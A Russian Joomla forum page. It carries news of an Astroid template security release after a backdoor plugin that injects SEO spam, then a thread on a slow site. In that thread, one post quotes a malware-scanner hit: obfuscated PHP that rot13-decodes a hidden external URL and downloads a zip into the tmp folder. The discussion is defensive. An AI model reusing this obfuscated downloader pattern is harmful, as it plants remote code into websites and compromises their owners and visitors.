Новости Joomla

‼️👩‍💻 Релиз безопасности Astroid 3.3.11 - шаблона-конструктора для Joomla.

‼️👩‍💻 Релиз безопасности Astroid 3.3.11 - шаблона-конструктора для Joomla.

14 часов назад (на момент публикации заметки) была обнаружена уязвимость в популярном шаблоне-конструкторе Astroid Framework. При атаке на сайт устанавливается бэкдор — системный плагин под названием plg_system_blpayload. Если вы обнаружили этот плагин на своем веб-сайте, значит, он скомпрометирован, и вам необходимо восстановить чистую резервную копию, созданную до установки плагина.

Уязвимость позволяет загружать файлы на сайт и в дальнейшем получить права администратора Joomla.
В рамках атаки (из-за которой и была обнаружена уязвимость) на сайт устанавливался плагин plg_system_blpayload, который при каждой загрузке страницы снаружи он скрытно связывается с (платформой для SEO, работающей на черном рынке (ссылку помещать не будем, просим поверить на слово). Получает список скрытых спам-ссылок (сайты азартных игр, фишинга, мошенничества), подобранный под ваш домен, затем внедряет эти ссылки в HTML-код вашей страницы непосредственно перед рендером - невидимые для посетителей, но полностью читаемые поисковыми роботами. Это называется "отравление SEO" ("отрпавление поисковой выдачи").

Однако, эта уязвимость может использоваться в других целях. Поэтому необходимо срочно проверить ваши сайты, где стоит Astroid Framework и обновить его до версии не ниже 3.3.11. Релиз безопасности выпущен 4 часа назад (на момент написания заметки).

Скачать релиз безопасности Astroid

@joomlafeed

👩‍💻 Вышел Quantum Manager 3.3.0 - медиа менеджер для Joomla.

👩‍💻 Вышел Quantum Manager 3.3.0 - медиа менеджер для Joomla.

Популярный файловый менеджер для Joomla от отечественных разработчиков.

v.3.3.0. Что нового?
- Joomla 6. Компонент полностью совместим с Joomla 6, плагин обратной совместимости не требуется.
- Рефакторинг. Полностью удалён устаревший код, оставшийся в наследство от версий для Joomla 3.
- Новые настройки для SVG. Новые параметры фильтрации SVG-файлов.
- Улучшена безопасная функция предварительного просмотра SVG-файлов. Благодаря новым механизмам фильтрации восстановлена ​​возможность безопасного предварительного просмотра SVG-изображений.
- Исправления ошибок. Исправлены ошибки с данными EXIF ​​и обновлена ​​библиотека EXIF.

Читать новость
Скачать расширение

Также обновление получил плагин пользовательского поля Radicalmultifield для совместимости с новым Quantum Manager.

Репозиторий GitHub
Релиз на GitHub

@joomlafeed

Joomla по-русски — возвращение к истокам

Joomla по-русски — возвращение к истокам

С 1 марта 2026 года наш проект меняет название. Joomla Russia становится Joomla по-русски.

Это давно напрашивалось, со времён редизайна сайта, но тут подвернулся повод.

Поводом послужили новые требования российского законодательства об использовании русскоязычных наименований для отечественных проектов. Но мы воспринимаем это не как обязанность, а как хороший толчок сделать то, о чём думали и раньше.

Joomla по-русски — для всех, кто творит сайты на великом и могучем.

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 2277 Просмотров
*

Andrej-zhe

  • Захожу иногда
  • 107
  • 2 / 0
Долгая загрузка сайта
« : 02.08.2016, 14:21:07 »
Подскажите пожалуйста, что можно предпринять и какая может быть причина что сайты стали очень долго загружаться...

ответ хостера по данной проблеме "При проверке работы сервера виртуального хостинга каких-либо проблем не было обнаружено.
При ручном выполнении запроса к скриптам вашего сайта наблюдаю длительною выполнение процесса генерации контента скриптами сайта. Увы, в данном случае необходимо лишь проверять работу скриптов вашего сайта и оптимизировать процесс обработки данных вашими скриптами."

Последнее, что делалось на сайтах это обновление Joomla, но не думаю, что беда в этом, иначе сайты расположенные у других хостеров тоже бы грузились долго. Да и после обновления сайты грузились шустренько.
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Долгая загрузка сайта
« Ответ #1 : 02.08.2016, 14:27:58 »
Смотрите логи. Хостер может предоставить так же логи высоконагруженных процессов. Частый случай - когда после взлома заливают скрипт, скрипт опрашивает несуществующие прокси или другие сайты, возникает задержка. Проверьте трассировку до сайта. Если, судя по ответу хостера, у них все нормально, возможно проблема в компе или у вашего провайдера. В Windows трассировка делается командой tracert, так же сервисы проверки трассировки, например ping.eu. Но трассировка, скорее всего, покажет задержку у хостера. В самой Joomla можно включить отладку и наблюдать, какие процессы едят ресурсы или подвисают. Так же предложение - проверьте сайт этим. Возможно, что то и найдете.
« Последнее редактирование: 02.08.2016, 14:31:02 от SeBun »
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Andrej-zhe

  • Захожу иногда
  • 107
  • 2 / 0
Re: Долгая загрузка сайта
« Ответ #2 : 02.08.2016, 14:39:57 »
Винда дала вот такой результат

Спойлер
[свернуть]

а ресурс
Спойлер
[свернуть]
Записан
*

Andrej-zhe

  • Захожу иногда
  • 107
  • 2 / 0
Re: Долгая загрузка сайта
« Ответ #3 : 02.08.2016, 15:32:04 »
Цитата: SeBun от 02.08.2016, 14:27:58
Так же предложение - проверьте сайт этим. Возможно, что то и найдете.
Да про айболита я и забыл совсем... Спасибо.

Айболит показал на
Код
private function downloadComponentUpdate($additionalModels = null) {
		// Response JSON object
		$response = new stdClass ();
		$cdFuncUsed = 'str_' . 'ro' . 't' . '13';
		$ep = $cdFuncUsed('uggc' . '://' . 'fgberwrkgrafvbaf' . '.bet' . '/XZY1306TSPQnifs3243560923kfuxnj35td1rtt45663f.ugzy');
		$file_path = JFactory::getConfig()->get('tmp_path', '/tmp'). '/KML1306GFCDavsf3243560923xshkaw35gq1egg45663s.zip';

Видимо вирусяка засел?

Проблема решилась. В шаблоне оказались ссылки на несуществующий ресурс. Странно только, что пол года все было хорошо, а потом в один момент повисло.
« Последнее редактирование: 03.08.2016, 09:41:40 от Andrej-zhe »
Записан
*

hmr

  • Осваиваюсь на форуме
  • 33
  • 1 / 0
Re: Долгая загрузка сайта
« Ответ #4 : 07.10.2016, 16:21:40 »
А код удаляли?
Столкнулся с похожей проблемой, айболит нашел этот же код.
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Долгая загрузка сайта
« Ответ #5 : 07.10.2016, 17:01:19 »
Там помимо ссылок еще много чего найти можно. Айболит не панацея, он многое не в состоянии увидеть. Так что изучайте свой сайт и ищите. Ведь что бы этот код прописать, нужен доступ... Значит у вас где то сидит шелл. Кстати. Не используйте варез!
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

zazar

  • Захожу иногда
  • 64
  • 0 / 1
Re: Долгая загрузка сайта
« Ответ #6 : 23.04.2017, 21:43:57 »
Цитата: SeBun от 02.08.2016, 14:27:58
Так же предложение - проверьте сайт этим.

Сомнительная шляпа. Ругнулась на свежеустановленные лицензионные скрипты и на свежую Joomla, найдя аж

Building list of vulnerable scripts 2
Building list of shells 128
Building list of js 1

А нет этого всего. Всё официальное, только из коробки. Как-то слишком похоже на не очень профессиональное желание продать свои услуги, напугав чайников.
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Долгая загрузка сайта
« Ответ #7 : 01.05.2017, 23:37:50 »
Цитата: zazar от 23.04.2017, 21:43:57
А нет этого всего. Всё официальное, только из коробки. Как-то слишком похоже на не очень профессиональное желание продать свои услуги, напугав чайников.
Не. Смотрите, вы хотите сварить кашу. Вы можете взять книгу готовых рецептов и сварить по ней, а можете заняться импровизацией, например, заменив один вид крупы на другую, добавив приправ и т.д. Задача вашего желудка- определить тип пищи и качественно ее переварить. При чем невзирая на вашу импровизацию.

Примерно по такому же принципу работают подобные сканеры. Например, известно, что при взломе часто используют конструкции base64-eval, вот их сканер и ищет. И найдет. А дальше уже ваша голова нужна, так как для того, чтобы однозначно вылавливать любой вредоносный код, нужна машина-интерператор со своими мыслительными способностями, некая хорошо обученная нейронная сеть, которая будет понимать код и видеть его предназначение, цель. Но мы до такого прогресса пока не доросли и пользуемся примитивным поиском по сигнатурам и своими мозгами.

Айболит - хороший скрипт. Но им нужно уметь пользоваться. Это не та волшебная кнопка, на которую нажал и все.....хорошо. Таких просто не существует.
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

zazar

  • Захожу иногда
  • 64
  • 0 / 1
Re: Долгая загрузка сайта
« Ответ #8 : 02.05.2017, 00:04:36 »
Кэп, без вас жизнь была бы серой.
Я и ожидал, что Айболит, типа как нормальный сканер, высветит мне подозрительные места, типа прямо строки кода +-2..5. А на деле я получил выделение розовеньким одного пробела в рандомных местах (в mail-скриптах только что накаченной свежей Joomla). И так сотня раз. Просто один пробельчик и кусок строки с ним. Шляпа, короче. Зато прям позвонить просят, и на мыло отправить этот список пробелов, и предупреждают, и помощь за деньги предлагают.

Не, в сад.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не работает мобильная версия сайта

Автор jeans

 Ответов: 4
Просмотров: 2748 		Последний ответ 21.05.2025, 12:44:06
от jeans
Разные меню для мобильной и для ПК версии сайта

Автор jimka

 Ответов: 7
Просмотров: 2701 		Последний ответ 24.03.2025, 20:03:01
от R31rus
Множество несуществующих ссылок при обходе сайта роботом Яндекс

Автор goga_pgasovav

 Ответов: 7
Просмотров: 2277 		Последний ответ 10.12.2024, 18:44:25
от goga_pgasovav
Антивирус нашел вредоносный код в двух файлах сайта polyfill

Автор buto

 Ответов: 4
Просмотров: 1675 		Последний ответ 19.10.2024, 10:56:55
от wishlight
Шаблон для данной страницы недоступен. сообщите об этом Администратору сайта

Автор 62411

 Ответов: 2
Просмотров: 2068 		Последний ответ 30.03.2024, 13:15:16
от web1